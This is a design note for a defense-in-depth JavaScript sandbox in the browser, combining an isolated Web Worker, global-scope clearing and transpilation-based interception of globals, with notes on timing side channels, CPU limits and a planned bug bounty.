laughinghan/paranoid_sandbox.md

## paranoid_sandbox.md

      
    Raw
  

              paranoid_sandbox.md
            
          
    Paranoid JS Sandbox in the browser

A design for a paranoid, secure-by-default, defense-in-depth JS sandbox.
3 different, complementary layers:

Web Worker with CSP blocking network requests, in a cross-domain iframe
everything but an allowlist is deleted from global scope in the worker and the iframe
transpilation & static analysis that intercepts access to globals (and intercepting calls to the function constructor)

These are very complementary: the first layer is simple and hard for us to get wrong, but reliant on the browser not get wrong; the second layer is hard for the browser to get wrong, but reliant on us not to get it wrong, at runtime; the third and final layer is really hard for the browser to get wrong, but really reliant on us not to miss anything.
Furthermore, the first layer is the only one preventing the untrusted code from freezing the page by infinite looping; and, the second and third layers can only clear out globals and manipulate built-in prototypes (the function constructor) because of the isolate realm provided by the first layer.
Limitations:

calls into and out of the sandbox must be async
only strict mode allowed, eval() is prohibited (but new Function() is allowed)
can't impose memory limits, and only rough time limits

Cross-domain Web Worker

Web Workers can't directly be cross-domain, so instead make an iframe to a page from a sandbox domain that serves a blank page that just launches a web worker, handles cross-window communication, and handles killing the Web Worker if it spends more than the configured CPU time without responding. Everything is deleted from global scope in the iframe too because there's no reason to leave it lying around.
Clearing of global scope

Before running the untrusted code, we loop over the global object and delete every global variable, saving ones we need first of course. The browser might not like this very much but it doesn't happen until runtime so it needs a bit of robustness; my current plan is to have a blocklist of known-bad globals like fetch or eval that, if they can't be deleted (we test whether deletion worked after each delete), we refuse to run the untrusted code at all. It's possible browsers aren't that finicky and it would work just fine to have an allowlist of globals that we allow to be undeleteable, but assuming so seems like it could hurt forwards-compatibility.
Transpilation & static analysis

During transpilation, we statically:

enforce "strict mode"
prohibit with-statements
restrict syntax to a known ECMAScript version, such as ES5

by contrast, Google Caja had bugs like not overriding AsyncFunction, AsyncGeneratorFunction, and dynamic import() or ignoring variables accesses that use ES6 Unicode escapes

weird how those blogposts don't talk about how the deeper problem wasn't Caja forgetting to override or account for one thing or another, but that it uses blocklists instead of allowlists—blocklists are inherently insecure-by-default!


I could've sworn there have also been JS sandboxing vulnerabilities due weird SpiderMonkey syntax extensions like E4X, but the closest I could find was this


And we replace:

references to the global object with a stand-in ordinary object
references to global variables with property accesses on the stand-in object

The stand-in fake global object, of course, only contains allowlisted globals, specifically those in the ECMAScript spec like RegExp, isNaN, etc, and API functions to communicate with the host. eval is of course omitted; Function is replaced by a stand-in function that runs the source text through this transpiler first before passing to the real Function constructor, which is closured but otherwise unreferenceable (and GeneratorFunction etc if ES >5 is supported).
To mitigate timing-based side-channel attacks, we completely fake the flow of time in the sandbox: while synchronous code runs, time doesn't appear to move, and timeouts appear "exact", e.g. if I call code in the sandbox at timestamp 123456000 and it runs for 25ms, even at the end the apparent current timestamp will still be 123456000; if it that code set a timeout for 10ms, then the apparent current timestamp when the timeout runs will be exactly 123456010,  even though the actual timestamp will be approximately 123456025. Also, at the beginning and end of any execution (whether intiated by calling into the sandbox or something asynchronous like a timeout), we send messages to the frame hosting the web worker so that it can measure approximately how much CPU time the web worker has been spending, and kill it after too much. I also think we can provide an API that will provide a smidge of timing information; assuming a default of 100ms CPU time limit, the API can return 0 when <50ms CPU time has been spent, 1 for 50-75ms, 2 for 75-87.5ms, and 3 for 87.5-100ms. This should allow tasks that want to spend the max allotted CPU time on whatever to approximately measure their speed without getting killed before they can return a useful response.
Known limitations:

this layer assumes that Function.prototype.constructor etc are overridden during initialization
this layer assumes insecure functions aren't added to built-in prototypes, a problem that ADsafe had (although strict mode would've covered most of those)
this layer relies on strict mode to ensure that this will be undefined in non-method function calls; I don't think any browsers support Web Workers but not strict mode, but still, this is a limitation of this layer

(in theory, transpilation could take care of this, such as by replacing this with _this and inserting var _this = this === window ? undefined : this at the top of every function, but I see no reason to)


there are other weird old browser features that would punch holes through this layer, especially SpiderMonkey extensions like .__parent__ and .caller

TODO elaborate on these; exhaustive list would be good too


Bug Bounty Program (eventual)

For defense-in-depth to make any sense, bounties have to be awarded for holes found in any layer even if the other layers render it unexploitable. That includes previously-unknown limitations of the transpilation layer, for example, although the bounty will be low if it only applies to some old SpiderMonkey version. Also, the hole would have to be related to our code/config; a browser bug in Web Workers probably wouldn't count unless it's a WONTFIX or likely to recur & easy to work around or something.